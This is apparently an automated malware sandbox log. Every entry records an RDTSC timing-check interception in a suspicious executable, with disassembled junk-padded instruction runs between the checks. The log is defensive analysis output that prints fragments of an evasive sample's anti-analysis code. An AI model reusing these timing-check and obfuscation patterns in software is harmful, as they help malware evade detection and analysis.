Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8B284E second address: 8B287F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007F98351AAB22h 0x0000000d push edi 0x0000000e pop edi 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 jnl 00007F98351AAB16h 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8B287F second address: 8B2883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8B2883 second address: 8B288D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F98351AAB16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8F15FE second address: 8F1604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8F1604 second address: 8F1609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8F3050 second address: 8F3055 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8BB06B second address: 8BB081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F98351AAB16h 0x0000000a pop esi 0x0000000b je 00007F98351AAB18h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8F653C second address: 8F6542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8F6542 second address: 8F6546 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8F6546 second address: 8F6554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F9834D7504Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8F9A62 second address: 8F9A6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F98351AAB16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8F9A6C second address: 8F9A70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8F9B54 second address: 8F9B98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F98351AAB28h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jnl 00007F98351AAB28h 0x00000017 mov eax, dword ptr [eax] 0x00000019 push eax 0x0000001a push edx 0x0000001b push ecx 0x0000001c pushad 0x0000001d popad 0x0000001e pop ecx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8F9B98 second address: 8F9B9D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8FA00A second address: 8FA00E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8FB2D3 second address: 8FB2DC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8FBD98 second address: 8FBDF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov dword ptr [esp], eax 0x00000008 mov dword ptr [ebp+122D1AFAh], edx 0x0000000e push 00000000h 0x00000010 jng 00007F98351AAB1Ch 0x00000016 mov dword ptr [ebp+122D264Ch], esi 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push edi 0x00000021 call 00007F98351AAB18h 0x00000026 pop edi 0x00000027 mov dword ptr [esp+04h], edi 0x0000002b add dword ptr [esp+04h], 0000001Ch 0x00000033 inc edi 0x00000034 push edi 0x00000035 ret 0x00000036 pop edi 0x00000037 ret 0x00000038 jmp 00007F98351AAB1Ch 0x0000003d xchg eax, ebx 0x0000003e push eax 0x0000003f push edx 0x00000040 push esi 0x00000041 jng 00007F98351AAB16h 0x00000047 pop esi 0x00000048 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8FBDF1 second address: 8FBE19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9834D75059h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pushad 0x00000012 popad 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8FBE19 second address: 8FBE23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F98351AAB16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8FBE23 second address: 8FBE27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8FCED3 second address: 8FCF09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98351AAB29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F98351AAB26h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8FC64F second address: 8FC654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8FCF09 second address: 8FCF8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98351AAB22h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dword ptr [ebp+1245D0A2h], edi 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007F98351AAB18h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 0000001Bh 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c jnl 00007F98351AAB19h 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push esi 0x00000037 call 00007F98351AAB18h 0x0000003c pop esi 0x0000003d mov dword ptr [esp+04h], esi 0x00000041 add dword ptr [esp+04h], 00000015h 0x00000049 inc esi 0x0000004a push esi 0x0000004b ret 0x0000004c pop esi 0x0000004d ret 0x0000004e sub dword ptr [ebp+12474255h], esi 0x00000054 sub esi, dword ptr [ebp+122D19D1h] 0x0000005a xchg eax, ebx 0x0000005b jo 00007F98351AAB24h 0x00000061 push eax 0x00000062 push edx 0x00000063 pushad 0x00000064 popad 0x00000065 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8FCF8A second address: 8FCF8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8FCF8E second address: 8FCFB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jmp 00007F98351AAB27h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8FCFB2 second address: 8FCFB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8FD783 second address: 8FD788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8FE3F5 second address: 8FE3FF instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9834D75046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8FE3FF second address: 8FE410 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F98351AAB1Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8FE410 second address: 8FE44E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9834D75046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov edi, dword ptr [ebp+122D24CCh] 0x00000013 push 00000000h 0x00000015 mov esi, ecx 0x00000017 push 00000000h 0x00000019 or dword ptr [ebp+122D2552h], esi 0x0000001f xchg eax, ebx 0x00000020 push eax 0x00000021 je 00007F9834D75048h 0x00000027 push ebx 0x00000028 pop ebx 0x00000029 pop eax 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d js 00007F9834D75051h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8FEAC4 second address: 8FEAE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98351AAB24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8FF5D7 second address: 8FF5DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8FF84D second address: 8FF866 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98351AAB25h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8FF866 second address: 8FF91C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9834D75050h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F9834D75051h 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007F9834D75048h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 0000001Dh 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push esi 0x0000002f call 00007F9834D75048h 0x00000034 pop esi 0x00000035 mov dword ptr [esp+04h], esi 0x00000039 add dword ptr [esp+04h], 00000019h 0x00000041 inc esi 0x00000042 push esi 0x00000043 ret 0x00000044 pop esi 0x00000045 ret 0x00000046 push 00000000h 0x00000048 jmp 00007F9834D75056h 0x0000004d xchg eax, ebx 0x0000004e pushad 0x0000004f pushad 0x00000050 pushad 0x00000051 popad 0x00000052 pushad 0x00000053 popad 0x00000054 popad 0x00000055 jg 00007F9834D7504Ch 0x0000005b popad 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f jns 00007F9834D75057h 0x00000065 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8FF91C second address: 8FF922 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 90430D second address: 904311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 90537E second address: 905382 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9070EE second address: 9070F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9070F2 second address: 9070F8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9070F8 second address: 9070FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9070FE second address: 907102 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 907102 second address: 907119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jmp 00007F9834D7504Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 909063 second address: 909067 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8B436F second address: 8B4389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9834D75054h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 909616 second address: 90961C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 90961C second address: 909620 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 909620 second address: 909624 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 909624 second address: 9096A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jng 00007F9834D75046h 0x00000013 popad 0x00000014 jne 00007F9834D7504Ch 0x0000001a popad 0x0000001b nop 0x0000001c add ebx, dword ptr [ebp+122D2719h] 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push ebx 0x00000027 call 00007F9834D75048h 0x0000002c pop ebx 0x0000002d mov dword ptr [esp+04h], ebx 0x00000031 add dword ptr [esp+04h], 0000001Bh 0x00000039 inc ebx 0x0000003a push ebx 0x0000003b ret 0x0000003c pop ebx 0x0000003d ret 0x0000003e or dword ptr [ebp+1245365Dh], eax 0x00000044 sub bh, FFFFFF9Bh 0x00000047 push 00000000h 0x00000049 adc bx, D3E0h 0x0000004e jne 00007F9834D7504Ch 0x00000054 xchg eax, esi 0x00000055 jmp 00007F9834D7504Eh 0x0000005a push eax 0x0000005b push esi 0x0000005c push esi 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9098EC second address: 9098F6 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F98351AAB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9098F6 second address: 909900 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F9834D75046h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 909900 second address: 90990E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 90A856 second address: 90A860 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F9834D75046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 90990E second address: 909912 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 90B657 second address: 90B65C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 90A860 second address: 90A877 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98351AAB1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 90B65C second address: 90B661 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 90A877 second address: 90A8EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 jmp 00007F98351AAB29h 0x0000000b pop eax 0x0000000c popad 0x0000000d nop 0x0000000e mov bh, 84h 0x00000010 push dword ptr fs:[00000000h] 0x00000017 jmp 00007F98351AAB1Ah 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 mov dword ptr [ebp+122D24B5h], edx 0x00000029 mov eax, dword ptr [ebp+122D14C9h] 0x0000002f mov dword ptr [ebp+1247E1B6h], ecx 0x00000035 push FFFFFFFFh 0x00000037 push 00000000h 0x00000039 push edi 0x0000003a call 00007F98351AAB18h 0x0000003f pop edi 0x00000040 mov dword ptr [esp+04h], edi 0x00000044 add dword ptr [esp+04h], 00000015h 0x0000004c inc edi 0x0000004d push edi 0x0000004e ret 0x0000004f pop edi 0x00000050 ret 0x00000051 mov bh, 3Eh 0x00000053 push eax 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 pop eax 0x00000059 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 90B661 second address: 90B684 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F9834D75055h 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 90C5AD second address: 90C5B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 90C5B2 second address: 90C636 instructions: 0x00000000 rdtsc 0x00000002 je 00007F9834D75048h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov dword ptr [ebp+122D256Dh], ebx 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007F9834D75048h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 00000017h 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 and bx, 8622h 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push esi 0x0000003b call 00007F9834D75048h 0x00000040 pop esi 0x00000041 mov dword ptr [esp+04h], esi 0x00000045 add dword ptr [esp+04h], 0000001Ah 0x0000004d inc esi 0x0000004e push esi 0x0000004f ret 0x00000050 pop esi 0x00000051 ret 0x00000052 mov ebx, dword ptr [ebp+122D3932h] 0x00000058 xchg eax, esi 0x00000059 jmp 00007F9834D75057h 0x0000005e push eax 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 push esi 0x00000064 pop esi 0x00000065 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 90C636 second address: 90C63C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 90C63C second address: 90C646 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F9834D75046h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 90C807 second address: 90C80D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 90C80D second address: 90C811 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 90F60A second address: 90F650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F98351AAB1Ah 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov bh, 61h 0x00000010 push 00000000h 0x00000012 jo 00007F98351AAB18h 0x00000018 mov ebx, esi 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push ecx 0x0000001f call 00007F98351AAB18h 0x00000024 pop ecx 0x00000025 mov dword ptr [esp+04h], ecx 0x00000029 add dword ptr [esp+04h], 00000017h 0x00000031 inc ecx 0x00000032 push ecx 0x00000033 ret 0x00000034 pop ecx 0x00000035 ret 0x00000036 push eax 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b pop eax 0x0000003c rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 90F650 second address: 90F669 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9834D75051h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 90C904 second address: 90C90A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 91059C second address: 9105A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9105A0 second address: 910601 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jnp 00007F98351AAB1Ch 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 pop edx 0x00000014 popad 0x00000015 nop 0x00000016 sub dword ptr [ebp+122D1FBFh], eax 0x0000001c push 00000000h 0x0000001e sub dword ptr [ebp+122D256Dh], esi 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push ebp 0x00000029 call 00007F98351AAB18h 0x0000002e pop ebp 0x0000002f mov dword ptr [esp+04h], ebp 0x00000033 add dword ptr [esp+04h], 00000017h 0x0000003b inc ebp 0x0000003c push ebp 0x0000003d ret 0x0000003e pop ebp 0x0000003f ret 0x00000040 xor dword ptr [ebp+122D1881h], edx 0x00000046 xchg eax, esi 0x00000047 pushad 0x00000048 jmp 00007F98351AAB1Bh 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 910601 second address: 910617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007F9834D7504Bh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9125B9 second address: 9125C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F98351AAB1Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9144C0 second address: 9144E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9834D75056h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007F9834D75046h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9144E2 second address: 91451B instructions: 0x00000000 rdtsc 0x00000002 jns 00007F98351AAB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e sub dword ptr [ebp+122D24E2h], ebx 0x00000014 push 00000000h 0x00000016 or ebx, dword ptr [ebp+122D3C43h] 0x0000001c push 00000000h 0x0000001e call 00007F98351AAB1Ch 0x00000023 jne 00007F98351AAB18h 0x00000029 pop edi 0x0000002a cld 0x0000002b xchg eax, esi 0x0000002c pushad 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 91451B second address: 914524 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 914524 second address: 914528 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
